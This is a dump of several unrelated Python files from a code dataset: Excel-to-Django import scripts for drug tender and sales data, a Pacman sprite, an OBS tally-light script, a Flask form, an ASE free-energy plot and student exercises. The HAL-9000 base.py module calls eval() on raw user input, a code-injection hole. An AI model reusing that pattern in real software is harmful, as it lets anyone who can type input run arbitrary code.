pd.read_excel(\"vbp_amount.xlsx\", sheet_name=\"第四轮集采 by 省\")\n # df = df[df[\"品种\"] != \"碳酸氢钠口服常释剂型\"]\n print(df)\n\n l = []\n for volume in df.values:\n print(volume)\n l.append(\n Volume(\n tender=Tender.objects.get(target=volume[1]),\n region=volume[0],\n spec=volume[2],\n amount_reported=volume[3],\n )\n )\n\n Volume.objects.bulk_create(l)\n\n\ndef import_bid():\n df = pd.read_excel(\"vbp.xlsx\", sheet_name=\"第四轮集采\", header=0)\n df.fillna(\"-\", inplace=True)\n print(df)\n\n tenders = Tender.objects.all()\n for tender in tenders:\n for bid in df.values:\n tender_name = bid[1]\n multi_spec = bid[2]\n spec = bid[3]\n company_full_name = bid[4]\n company_abbr_name = bid[5]\n origin = bid[6]\n mnc_or_local = bid[7]\n original_price = bid[10]\n bid_price = bid[11]\n region_win = bid[12]\n\n if tender_name == tender.target:\n if Company.objects.filter(full_name=company_full_name).exists():\n company = Company.objects.get(full_name=company_full_name)\n else:\n company = Company.objects.create(\n full_name=company_full_name,\n abbr_name=company_abbr_name,\n mnc_or_local=D_BOOLEAN[mnc_or_local],\n )\n if original_price == \"-\":\n bid_obj = Bid.objects.create(\n tender=tender,\n bidder=company,\n origin=D_BOOLEAN[origin],\n bid_spec=spec,\n bid_price=bid_price,\n )\n else:\n bid_obj = Bid.objects.create(\n tender=tender,\n bidder=company,\n origin=D_BOOLEAN[origin],\n bid_spec=spec,\n bid_price=bid_price,\n original_price=original_price,\n )\n\n if region_win != \"-\":\n list_region = [x.strip() for x in region_win.split(\",\")]\n for region in list_region:\n volume_objs = Volume.objects.filter(\n tender__target=tender_name, region=region,\n )\n for obj in volume_objs:\n obj.winner = bid_obj\n obj.save()\n\n # l = []\n # for tender in tenders:\n # l.append(Record(tender=tender, real_or_sim=True))\n\n # Record.objects.bulk_create(l)\n\n\ndef update_tender():\n tenders = Tender.objects.all()\n tender_begin = datetime.datetime.strptime(\"01-11-2020\", \"%d-%m-%Y\")\n for tender in tenders:\n if tender.vol == \"第三轮56品种\":\n tender.tender_begin = tender_begin\n tender.save()\n print(tender_begin)\n\n\n\"\"\"以下部分为rdpac导入模块\"\"\"\n\n\ndef import_company():\n df = pd.read_excel(\"rdpac.xlsx\", sheet_name=\"summary\", header=0)\n df = df.drop_duplicates(\"Company Name_CN\")\n # pivoted = pd.pivot_table(df, index='药品通用名', values='最高限价', aggfunc=np.mean)\n # d = pivoted.to_dict()['最高限价']\n\n l = []\n for company in df.values:\n print(company)\n l.append(\n Company(\n name_cn=company[1],\n name_en=company[2],\n abbr=company[0],\n country_code=company[3],\n )\n )\n\n Company.objects.all().delete()\n Company.objects.bulk_create(l)\n\n\ndef import_drug():\n df = pd.read_excel(\"rdpac.xlsx\", sheet_name=\"summary\", header=0)\n df.fillna(\"\", inplace=True)\n df = df.drop_duplicates(\"Product Name-RDPAC\")\n\n l = []\n for drug in df.values:\n print(drug)\n l.append(\n Drug(\n molecule_cn=drug[6],\n molecule_en=drug[7],\n product_name_cn=drug[5],\n product_name_en=drug[4],\n )\n )\n\n Drug.objects.all().delete()\n Drug.objects.bulk_create(l)\n\n\ndef import_sales():\n df = pd.read_excel(\"rdpac.xlsx\", sheet_name=\"summary\", header=0)\n \n Sales.objects.all().delete()\n \n start_col = 15\n for sale in df.values:\n print(sale)\n for j in range(8):\n company = Company.objects.get(name_cn=sale[1])\n drug = Drug.objects.get(product_name_en=sale[4])\n \n if math.isnan(sale[start_col+j]) is False:\n sale_obj = Sales.objects.create(\n company = company,\n drug = drug,\n year = df.columns[start_col+j],\n 
netsales_value = sale[start_col+j]\n )\n \n # tenders = Tender.objects.all()\n # for tender in tenders:\n # for bid in df.values:\n # tender_name = bid[1]\n # multi_spec = bid[2]\n # spec = bid[3]\n # company_full_name = bid[4]\n # company_abbr_name = bid[5]\n # origin = bid[6]\n # mnc_or_local = bid[7]\n # original_price = bid[10]\n # bid_price = bid[11]\n # region_win = bid[12]\n\n # if tender_name == tender.target:\n # if Company.objects.filter(full_name=company_full_name).exists():\n # company = Company.objects.get(full_name=company_full_name)\n # else:\n # company = Company.objects.create(\n # full_name=company_full_name,\n # abbr_name=company_abbr_name,\n # mnc_or_local=D_BOOLEAN[mnc_or_local],\n # )\n # if original_price == \"-\":\n # bid_obj = Bid.objects.create(\n # tender=tender,\n # bidder=company,\n # origin=D_BOOLEAN[origin],\n # bid_spec=spec,\n # bid_price=bid_price,\n # )\n # else:\n # bid_obj = Bid.objects.create(\n # tender=tender,\n # bidder=company,\n # origin=D_BOOLEAN[origin],\n # bid_spec=spec,\n # bid_price=bid_price,\n # original_price=original_price,\n # )\n\n # if region_win != \"-\":\n # list_region = [x.strip() for x in region_win.split(\",\")]\n # for region in list_region:\n # volume_objs = Volume.objects.filter(\n # tender__target=tender_name, region=region,\n # )\n # for obj in volume_objs:\n # obj.winner = bid_obj\n # obj.save()\n\n # l = []\n # for tender in tenders:\n # l.append(Record(tender=tender, real_or_sim=True))\n\n # Record.objects.bulk_create(l)\n \n \nif __name__ == \"__main__\":\n # importModel(D_MODEL)\n # import_tender()\n # import_volume()\n # import_bid()\n # update_tender()\n # import_company()\n import_drug()\n import_sales()\n print(\"Done!\", time.process_time())\n # print(Drug.objects.get(pk=2248).product_name_cn)","sub_path":"import_django.py","file_name":"import_django.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"37467124","text":"# Check if a large number is divisible by 4 or not\n# Given a number, the task is to check if a number is divisible by 4 or not.\n# The input number may be large and it may not be possible to store even if we use long long int.\n\ndef DivisibleBy4(n):\n\n cnt=0\n lst=[]\n\n while cnt<2:\n rem=n%10\n lst.append(str(rem))\n cnt=cnt+1\n n=n//10\n\n lst.reverse()\n\n if int(''.join(lst))%4==0:\n return True\n else:\n return False\n\ndef main():\n\n n=1124\n print(DivisibleBy4(n))\n\n n = 76952\n print(DivisibleBy4(n))\n\n n = 1234567589333862\n print(DivisibleBy4(n))\n\n n = 363588395960667043875487\n print(DivisibleBy4(n))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/DivisibleBy4.py","file_name":"DivisibleBy4.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618779579","text":"\"\"\"\n HAL-9000 for Python is a Software PA\n Copyright (C) 2015 Rory Buchanan\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
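Two notes on import_django.py above. math.isnan(sale[start_col+j]) is False is conventionally written not math.isnan(...). More importantly, the file star-imports models from both vbp and rdpac, and each section uses a Company model with different fields (full_name/abbr_name versus name_cn/name_en/abbr), so whichever import runs last silently shadows the other name. Explicit, aliased imports make the intent visible (a sketch; the exact model lists are assumptions, since the models modules are not shown here):

    from vbp.models import Tender, Volume, Bid, Company as VbpCompany
    from rdpac.models import Company as RdpacCompany, Drug, Sales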
See the\n    GNU General Public License for more details.\n\n    You should have received a copy of the GNU General Public License\n    along with this program. If not, see <http://www.gnu.org/licenses/>.\n\"\"\"\n\n\nfrom searching import *\nfrom name import *\nfrom miscfunc import *\nfrom config import *\n\n\ndef init():\n    print(\"Loading... \")\n    is_search_hist()\n    start()\n    nom()\n    print(\"Initialisation Successful\")\n    input(\"Press enter to continue...\")\n    startwrite()\n    n = 0\n    while n == 0:\n        okgo()\n\n\ndef isfunc(n):\n    test_1 = 0\n    while test_1 == 0:\n        try:\n            eval(n)()\n        except NameError:\n            return 0\n        else:\n            test_1 += 1\n    return 1\n\n\ndef okgo():\n    c = 0\n    while c == 0:\n        x = input(\"What Now? \")\n        if x == '':\n            print(\"NOT A VALID FUNCTION!\")\n        elif isfunc(x) == 1:\n            eval(x)\n            c = 1\n        else:\n            print(\"NOT A VALID FUNCTION!\")\n","sub_path":"HAL-9000/HAL9000/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"299048564","text":"import obspython as obs\nfrom obs_change_notifier import OBSChangeNotifier\n\nclient = OBSChangeNotifier(\n    obs=obs,\n    watched_source='Camera A',\n    base_url='http://localhost:4567/repeater',\n    debug_heartbeats=True\n    )\n\ndef script_description():\n    global client\n\n    return \"Tally light management for \" + client.watched_source\n\ndef script_load(settings):\n    global client\n\n    client.connect('source_activate', '?key=A&value=GREEN')\n    client.connect('source_deactivate', '?key=A&value=RED')\n    client.set_current('?key=A&value=RED')\n\ndef script_unload():\n    global client\n\n    client.set_current('?key=A&value=RED')\n","sub_path":"camera_a_tally_light.py","file_name":"camera_a_tally_light.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"182761110","text":"import pygame\n\nfrom pygame.locals import *\n\nclass Pacman(pygame.sprite.Sprite):\n    \n    def __init__(self, x, y, speed, collisions):\n        # Call the parent class constructor\n        pygame.sprite.Sprite.__init__(self)\n        \n        # Get the main window's display\n        self.surface = pygame.display.get_surface()\n        \n        # Set animation frames\n        self.frames = [ '../../sprites/pacman.png',\n                        '../../sprites/pacman-2.png',\n                        '../../sprites/pacman-3.png',\n                        '../../sprites/pacman-2.png',\n                        ]\n        \n        # Used to determine which frame the animation is in\n        # Therefore, the index can go as far as 3 before resetting back to zero\n        # if the movement were continuous\n        self.index = 0\n        \n        # This dictionary contains the possible direction keywords\n        # Each keyword points to the correct orientation of the image\n        self.directions = { 'U': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 90),\n                            'D': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 270),\n                            'L': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 180),\n                            'R': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 0),\n                            }\n        \n        # Keep history of the last movement made\n        # lastMove can be 'U' | 'D' | 'L' | 'R'\n        # Pacman starts looking right, so \"R\" is the initial value\n        self.lastMove = 'R'\n        \n        # Will become true if one of the movement variables are true\n        self.isMoving = False\n        \n        # Get the sprite and set the x+y coordinates\n        self.image = self.directions[self.lastMove]\n        self.rect = self.image.get_rect()\n        self.rect.x = x\n        self.rect.y = y\n        \n        # Setting the pixels per loop of the sprite\n        self.speed = speed\n        \n        # Set the collisions 
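(the sprite group that blocks movement) 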
for Pacman\n        self.collisions = collisions\n        \n    def update(self, moveUp, moveDown, moveLeft, moveRight):\n\n        list_of_movement = [moveLeft, moveRight, moveDown, moveUp]\n        \n        if list_of_movement.count(True) > 0:\n            self.isMoving = True\n        else:\n            self.isMoving = False\n        \n        # if Pacman is moving, continue looping through the animation frames\n        if self.isMoving:\n            self.index += 1\n            if self.index == len(self.frames):\n                self.index = 0\n        else:\n            self.index = 0\n        \n        if moveUp:\n            self.rect.top -= self.speed\n            if not pygame.sprite.spritecollide(self, self.collisions, False):\n                self.lastMove = 'U'\n            else:\n                self.rect.top += self.speed\n                self.index = 0\n        \n        if moveDown:\n            self.rect.bottom += self.speed\n            if not pygame.sprite.spritecollide(self, self.collisions, False):\n                self.lastMove = 'D'\n            else:\n                self.rect.bottom -= self.speed\n                self.index = 0\n        \n        if moveLeft:\n            self.rect.left -= self.speed\n            if not pygame.sprite.spritecollide(self, self.collisions, False):\n                self.lastMove = 'L'\n            else:\n                self.rect.left += self.speed\n                self.index = 0\n        \n        if moveRight:\n            self.rect.right += self.speed\n            if not pygame.sprite.spritecollide(self, self.collisions, False):\n                self.lastMove = 'R'\n            else:\n                self.rect.right -= self.speed\n                self.index = 0\n        \n        # Directions is called again to update the image based on index\n        self.directions = { 'U': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 90),\n                            'D': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 270),\n                            'L': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 180),\n                            'R': pygame.transform.rotate(pygame.image.load(self.frames[self.index]), 0),\n                            }\n        \n        # Update image\n        self.image = self.directions[self.lastMove]\n        ","sub_path":"tests/12 - Point System (in Level)/Pacman.py","file_name":"Pacman.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"216753934","text":"import sys\nsys.path.append('.')\nfrom . import *\n\nclass E0800Responses(FlaskForm):\n\tresponse = SelectField(\n\t\t'''Did the resident reject evaluation or care \n\t\t(e.g., bloodwork, taking medications, ADL assistance) \n\t\tthat is necessary to achieve the resident's goals for health and well-being? 
\n\t\tDo not include behaviors that have already been addressed \n\t\t(e.g., by discussion or care planning with the resident or family), \n\t\tand determined to be consistent with resident values, preferences, or goals.''',\n\t\tchoices=[\n\t\t('-1', 'Please select one'),\n\t\t('00', 'Behavior not exhibited.'),\n\t\t('01', 'Behavior of this type occurred 1 to 3 days.'),\n\t\t('02', 'Behavior of this type occurred 4 to 6 days, but less than daily.'),\n\t\t('03', 'Behavior of this type occurred daily.')\n\t\t],\n\t\tvalidators=[InputRequired()])\n\nclass E0800Form(FlaskForm):\n\tsection = 'Section_E'\n\tname = 'e0800'\n\tquestion = 'Rejection of Care - Presence & Frequency'\n\tresponses = FormField(E0800Responses)\n\tsubmit = SubmitField(\"Submit\")","sub_path":"app/main/forms/section_e/e0800_form.py","file_name":"e0800_form.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"606513093","text":"from ase.vibrations import Infrared\nfrom ase.vibrations import Vibrations\nfrom ase.thermochemistry import IdealGasThermo\nfrom ase.io import read,write\nimport matplotlib.pyplot as plt\nfrom gpaw import GPAW, FermiDirac, PoissonSolver, Mixer,PW\nfrom ase.calculators.vasp import Vasp\nfrom matplotlib.pyplot import *\nimport numpy as np\nimport os\n\n#constants\nkB=8.61733*10**-5 # eV/K\nT = 600 # K\np0 =1.01325 * 1e3 # bar\n#all the GO structures\nO2 = read('O2_molecule_DFTrelaxed_kpts221_spinpolarisedcal.traj')\nPt7 = read('Pt7_Al2O3_DFTrelaxed_GMplanar.traj')\nPt7_O2 = read('Pt7O2_Al2O3_GMDFTrelaxed.traj')\nPt7_2O2 = read('Pt7O4_Al2O3_GMDFTrelaxed.traj')\nPt7_3O2 = read('Pt7O6_Al2O3_GMDFTrelaxed.traj')\nPt7_4O2 = read('Pt7O8_Al2O3_GMDFTrelaxed.traj')\nPt7_5O2 = read('Pt7O10_Al2O3_GMDFTrelaxed.traj')\nPt7_6O2 = read('Pt7O12_Al2O3_GMDFTrelaxed.traj')\nPt7_7O2 = read('Pt7O14_Al2O3_GMDFTrelaxed.traj')\n#Pt7_8O2 = read('Pt7O16_Al2O3_GMDFTrelaxed.traj')\n\nga_stru =[Pt7_O2,Pt7_2O2,Pt7_3O2,Pt7_4O2,Pt7_5O2,Pt7_6O2,Pt7_7O2]\n\nN_O = [2,4,6,8,10,12,14]\nOxygen_correct = -0.5\n# energies of structures\nE_O2 = O2.get_potential_energy()\nE_Pt7 = Pt7.get_potential_energy()\nE_Pt7O2 = Pt7_O2.get_potential_energy()\nE_Pt72O2 = Pt7_2O2.get_potential_energy()\nE_Pt73O2 = Pt7_3O2.get_potential_energy()\nE_Pt74O2 = Pt7_4O2.get_potential_energy()\nE_Pt75O2 = Pt7_5O2.get_potential_energy()\nE_Pt76O2 = Pt7_6O2.get_potential_energy()\nE_Pt77O2 = Pt7_7O2.get_potential_energy()\n#E_Pt78O2 = Pt7_8O2.get_potential_energy()\n###########################################\nGs_slab ={}\ncolors = {}\n#color_lib = ['#377eb8','#4daf4a','#984ea3','#a65628','#ffff33']\ncolor_lib = ['#377eb8','#4daf4a','#984ea3','#a65628','#999999','#FF0000', '#ff7f00','#ffff33']\nprint(color_lib)\nresolution = 300\nalpha_back =0.70\nalpha_front =1.0\n\nfor i,atoms in enumerate(ga_stru):\n e = atoms.get_potential_energy()\n Gs_slab[i] = e\n colors[i] = color_lib[i]\n# vibrational frequency calculations\ncalc = GPAW(mode=PW(500),xc='PBE',\n spinpol=True,\n kpts=(2,2,1),\n symmetry={'point_group': False},\n basis='dzp')\nO2.set_calculator(calc)\nO2vib = Infrared(O2)\n#print(O2vib)\n#O2vib.run()\n#O2vib.summary()\ne_O2vib = O2vib.get_energies()\n#print(e_O2vib)\n\nthermo = IdealGasThermo(vib_energies=e_O2vib,\n atoms=O2,\n geometry='linear',\n symmetrynumber=2, spin=1)\n\n#print(e_O2vib)\ndef get_mu(T,p):\n G = thermo.get_gibbs_energy(temperature=T, pressure=p0, verbose=False)\n #print(p0,T)\n mu0 = 0.5*G\n mu = mu0 + 0.5*kB*T*np.log(p / (1.01325 * 1e3))\n # 
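debug trace, left disabled: 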
print(T,p,np.log(p / (1.01325 * 1e3)),mu)\n    return mu\n\n\ndef get_required_deltaG_atmup(i,mu):\n    G = delta_E[i]-N_O[i]*mu\n    #print(i,G,delta_E[i])\n    return G\n\n\ndef get_lowest_e(mu):\n    lowest_e = 1000000000000000.000\n    lowest_N = None\n    for i in range(0,len(N_O)):\n        #print(get_required_deltaG_atmup(i,mu))\n        if get_required_deltaG_atmup(i,mu) <= lowest_e:\n            lowest_e = get_required_deltaG_atmup(i,mu)\n            lowest_N = i\n    #print(lowest_N,lowest_e)\n    return [lowest_N,lowest_e]\n\ndef get_lowest_e_pt(mu):\n    lowest_e = 100000000000000000.000\n    lowest_N = None\n    for i in range(0,len(N_O)):\n        if get_required_deltaG_atmup(i,mu) <= lowest_e:\n            lowest_e = get_required_deltaG_atmup(i,mu)\n            N = N_O[i]\n            lowest_N = N\n    return [lowest_N,lowest_e]\n\n\ndef get_highest_e(mu):\n    highest_e = -100000000.00\n    highest_N = None\n    for i in range(0,len(N_O)):\n        if get_required_deltaG_atmup(i,mu) >= highest_e :\n            highest_e = get_required_deltaG_atmup(i,mu)\n            highest_N = i\n    return [highest_N,highest_e]\n\ndef get_highest_e_pt(mu):\n    highest_e = -100000000.00\n    highest_N = None\n    for i in range(0,len(N_O)):\n        if get_required_deltaG_atmup(i,mu) >= highest_e :\n            highest_e = get_required_deltaG_atmup(i,mu)\n            N = N_O[i]\n            highest_N = N\n    return [highest_N,highest_e]\n    \n\nps = np.power(10,[-30.,-28.,-26.,-24.,-22.,-20.,-18.,-16.,-14.,-12.,-10.,-8.,-6.,-4.,-2.,0.,2.,4.,6.,8.,10.,12.,14.,16., 18.,20.,22.,24.,26.,28.,30.])\n#print(ps)\n#exit()\nmu_p = [get_mu(T,p) for p in ps]\nprint(mu_p)\ndelta_E =np.zeros(len(ga_stru))\nfor i,atoms in enumerate(ga_stru):\n    delta_E[i] = (ga_stru[i].get_potential_energy() - E_Pt7-(N_O[i]*0.5*E_O2)) \n    # print(delta_E[i])\n\n#fig, ax = plt.subplots()\nfig = figure(figsize=(10,5))\nax1 = fig.add_subplot(121)\n\ndelta_G =np.zeros([len(ga_stru),len(mu_p)])\nax1.plot(mu_p,delta_G[0,:],'-',color='#ffff33',label='Pt$_{7}$O$_0$',zorder=2)\nfor i in range(len(ga_stru)):\n    for j in range(len(mu_p)):\n        delta_G[i,j] = delta_E[i]-N_O[i]*mu_p[j]\n        print(delta_G[i,j])\n    ax1.plot(mu_p, delta_G[i,:],'-',color=colors[i],label='Pt$_{7}$O$_{'+str(N_O[i])+'}$',zorder=2)\n    # print(delta_G[i,:])\n\n#xlims =[min(mu_p),max(mu_p)]\nxlims =[-2.23,0.0]\nprint(xlims)\nax1.set_xlim(xlims)\n# Lowest line and fill\n#ylims = [get_lowest_e(mu_p[0])[1]*1.1,get_highest_e(mu_p[-1])[1]*1.1]\nylims =[-16.0,10.0]\nax1.set_ylim(ylims)\n#print(ylims)\nxticks([-2.0,-1.5,-1.0,-0.5,0.0],[r'-2.0','-1.5','-1.0','-0.5','0.0'])\nyticks([-16.0,-14.0,-12.0,-10.0,-8.0,-6.0,-4.0,-2.0,0.0,2.0,4.0,6.0,8.0,10.0],['-16.0','-14.0','-12.0','-10.0','-8.0','-6.0','-4.0','-2.0','0.0','2.0','4.0','6.0','8.0','10.0'])\n\nmu_first = mu_p[0]\n#print(mu_first)\n#print(np.linspace(mu_p[0],mu_p[-1]+1e-10, 200))\nfor mu_last in np.linspace(mu_p[0],mu_p[-1]+1e-10, 200):\n    off = 0.\n    if get_lowest_e(mu_first)[0] != get_lowest_e(mu_last)[0] or mu_last > mu_p[-1]:\n        if mu_first > -1.:\n            off = 0.01\n        #print(mu_first)\n        ax1.plot([mu_first+off, mu_last], [get_lowest_e(mu_first)[1], get_lowest_e(mu_last)[1]],\n                 '-', lw=4, color=colors[get_lowest_e(mu_first)[0]], alpha=alpha_front, zorder=3)\n        ax1.fill_between([mu_first, mu_last],[ylims[-1], ylims[-1]], [ylims[0],ylims[0]], lw=0.,\n                         color=colors[get_lowest_e(mu_first)[0]], alpha=alpha_back, zorder=1)\n        mu_first = mu_last\n\nax1.legend(loc='upper right', frameon=False)\nax1.set_xlabel(r'$\\Delta \\mu_\\mathrm{O}(T,p)$ (eV)')\nax1.set_ylabel(r'$\\Delta G$ (eV)')\nax1.set_title('(a) Free energy diagram at 600 K Temp.')\n# p-T diagram\nax2 = fig.add_subplot(122)\nT_range = np.linspace(100, 1200, resolution)\np_range = 
np.power(10,np.linspace(-24, 30, resolution))\nz = np.zeros((len(T_range), len(p_range)))\nmu_z = np.zeros((len(T_range), len(p_range)))\n\nlevels = []\nlevels1 = []\nfor i,T in enumerate(T_range):\n for j,p in enumerate(p_range):\n mu_z[i][j] = get_mu(T,p)\n #print(get_lowest_e(mu_z[i][j])[0])\n z[i][j] = get_lowest_e_pt(mu_z[i][j])[0]\n if get_lowest_e(mu_z[i][j])[0] not in levels:\n levels.append(get_lowest_e(mu_z[i][j])[0])\n levels1.append(get_lowest_e_pt(mu_z[i][j])[0])\n #if (T >100):\n # exit() \n\n\nmu_z = np.transpose(mu_z)\nz = np.transpose(z)\n#print(z[:][:])\n\ncolor_levels = []\nfor level in levels:\n color_levels.append(colors[level])\n\nprint(color_levels)\nlevels = [l for l in levels1]\nprint(levels)\n\nlevels.append(0)\nprint(levels)\n# levels index\nlevels = np.sort(levels)\nprint(levels)\nchangedvalues =[4,3,2,1,0]\ncolor_levels1=[]\nfor i,a in enumerate(changedvalues):\n color_levels1.append(color_levels[a])\nprint(color_levels1)\nax2.contourf(T_range, p_range, z,levels=levels,colors=color_levels1, alpha=alpha_back, antialiased=True)\nax2.set_yscale('log')\nax2.set_ylim([p_range[0],p_range[-1]])\nax2.set_xlim([T_range[0],T_range[-1]])\nyticks(np.power(10,np.linspace(-24,30,22)),range(-24,30,2))\nxticks(range(100,1201,200),range(100,1201,200))\nax2.set_title('(b) Phase diagram')\nax2.set_ylabel(r'log$_{10}$($\\frac{p}{p_0}$)')\nax2.set_xlabel(r'$T$ (K)')\nax2.text(0.1, 0.60,'Pt$_7$O$_{14}$',color=color_levels1[4],alpha=1.0,fontsize=16, transform=ax2.transAxes)\n#ax2.text(0.2, 0.5,'Pt$_7$O$_{12}$',fontsize=16,color=color_levels1[4],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.4, 0.5,'Pt$_7$O$_{10}$',fontsize=16, color=color_levels1[3],alpha=1.0,transform=ax2.transAxes)\n#ax2.text(0.3, 0.4,'Pt$_7$O$_{8}$',fontsize=16, color=color_levels1[3],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.4, 0.3,'Pt$_7$O$_{6}$',fontsize=16, color=color_levels1[2],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.7, 0.40,'Pt$_7$O$_{4}$',fontsize=16,color=color_levels1[1],alpha=1.0,transform=ax2.transAxes)\nax2.text(0.7, 0.2,'Pt$_7$O$_{2}$',fontsize=16,color=color_levels1[0],alpha=1.0,transform=ax2.transAxes)\n\nsavefig('free_energy_diagram_Pt7Oxides_600K.pdf')\nplt.show()\n","sub_path":"Platinum_clusters_Project/free_energy_phase_diagrams/free_energy_Pt7Oxides_kpts221/free_energy_plot_Pt7_T600K_old.py","file_name":"free_energy_plot_Pt7_T600K_old.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212397847","text":"from __future__ import print_function\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport random\n\n'''Procedure'''\n#1-3\n'''Part I: for loops, range(), and help()'''\n#4\ndef days():\n ''' Explain the function here\n '''\n for day in 'MTWRFSS': \n print(day + 'day')\n for day in range(5,8):\n print('It is the ' + str(day) + 'th of September')\n \ndef picks():\n a = [] # make an empty list\n # Why all the brackets below? 
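(random.choice picks one item from a sequence, and += extends the list with an iterable)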
\n    # a += [ brackets here to add an iterable onto a list]\n    # random.choice( [brackets here to choose from a list])\n\n    a += [random.choice([1, 3, 10])]\n    for choices in range(5):\n        a += [random.choice([1, 3, 10])]\n\n    plt.hist(a)\n    plt.savefig('1.3.7/picks2')\n#5\ndef dice(n):\n    randlist = []\n    randcount = 0\n    while randcount < n:\n        randlist.append(random.randint(1,6))\n        print (randlist)\n        randcount = randcount + 1\n    plt.hist(randlist, bins = [1,2,3,4,5,6])\n    plt.savefig(\"1.3.7/new_piks.png\")\n    return (sum(randlist))\n\ndef roll_hundred_pair():\n    dice_roll_list = dice(100)\n    return dice_roll_list\n\n'''Part II: While loops'''\n#7 line 2 is necessary because if you set the guess to a value when you re-run \n# this code it will use the same value used as last time\ndef validate():\n    guess = '1' # initialization with a bad guess so loop starts\n    answer = 'hangman word'\n    while guess not in answer:\n        guess = raw_input('Name a letter in \\''+answer+'\\': ')\n    print('Thank you!')\n#8\ndef guess_winner(players=('Amy', 'Bill', 'Cathy', 'Dale')):\n    '''Summarize the function in this docstring.\n    \n    Provide descriptions for the arguments and say what type each one is.\n    Describe the type and meaning of the value returned.\n    '''\n    winner = random.choice(players) \n    # prints whether the chosen person won the lottery\n    print('Guess which of these people won the lottery: ',end='')\n    for p in players[:len(players)-1]: # keeps running until the length of the \n        #index is gone through\n        print(p+', ', end='')\n    print(players[len(players)-1]) # prints the last player without a trailing comma\n    #check if person won or not\n    guesses = 1 \n    while raw_input() != winner:\n        print('Guess again!')\n        guesses += 1\n    print('You guessed in', guesses, 'guesses!')\n    return guesses\n#9\ndef goguess():\n    '''try to guess the random number given the hints, in the least amount of\nguesses'''\n    randnumbergoguess = random.randint(0,20)\n    goguessguess = 21\n    guessescount = 0\n    while int(goguessguess) != int(randnumbergoguess):\n        goguessguess = raw_input()\n        guessescount = guessescount + 1\n        if int(goguessguess) < int(randnumbergoguess):\n            print ('', goguessguess ,' is too low')\n        elif int(goguessguess) > int(randnumbergoguess):\n            print ('', goguessguess ,' is too high')\n    return print('You guessed in', guessescount, 'guesses!')\n#10 you need 12 tries because if you choose in the middle every time then you \n# will know to go up or down and that will allow you to narrow in on your\n# target quicker\n'''Part III: Practice'''\n#11a\ndef matches(ticket, winners):\n    '''find out how many of your lottery ticket numbers are correct'''\n    numberscorrect = 0\n    if winners.count(ticket[0]) >0:\n        numberscorrect = numberscorrect + 1\n    if winners.count(ticket[1]) >0:\n        numberscorrect = numberscorrect + 1\n    if winners.count(ticket[2]) >0:\n        numberscorrect = numberscorrect + 1\n    if winners.count(ticket[3]) >0:\n        numberscorrect = numberscorrect + 1\n    if winners.count(ticket[4]) >0:\n        numberscorrect = numberscorrect + 1\n    print (numberscorrect)\n    return numberscorrect\n#11b\ndef report(guess, secret):\n    '''find out how many of your mastermind guesses are right'''\n    numberscorrectinplace = 0\n    checkstep = 0\n    while len(guess) > checkstep:\n        if guess[checkstep] == secret[checkstep]:\n            numberscorrectinplace = numberscorrectinplace + 1\n        checkstep = checkstep + 1\n    checkstep = 0\n    numberscorrecteverywhere = 0\n    while len(guess) > checkstep:\n        if guess[checkstep] in secret:\n            numberscorrecteverywhere = numberscorrecteverywhere +1\n        checkstep = checkstep + 1\n    
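# print exact-position matches first, then matches counted anywhere in the secret\n    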
print(numberscorrectinplace, numberscorrecteverywhere)\n    \n'''Conclusion'''\n#1 it is harder to interpret and takes up more bytes. It can also get stuck\n# in a loop more easily\n#2 in iteration you go through everything step by step, one at a time.\n#3 they are very similar and can always be used interchangeably but a for loop\n# is better at things that need iteration\n#4 We didn't really work together all that much because I finished this by\n# myself as it says it is due tonight, Monday, so I didn't get the time to work\n# on this with my partner.\n\n'''Assignment Check'''\n#1.3.7 Function Test\nroll_hundred_pair()\ngoguess()\ngoguess()\nprint('next 4 lines should be 2,3,2,3')\nmatches([11, 12, 13, 14, 15], [3, 8, 12, 13, 17])\nmatches([11, 12, 13, 14, 15], [11, 8, 12, 15, 17])\nreport(['red','red','red','green','yellow'], ['red','red','yellow','yellow','black'])\nreport(['red','blue','red','green','yellow'], ['red','blue','yellow','yellow','yellow'])\n# based on this I get the correct results leading me to believe that my\n# method is correct","sub_path":"1.3.7/Shah_1.3.7.py","file_name":"Shah_1.3.7.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
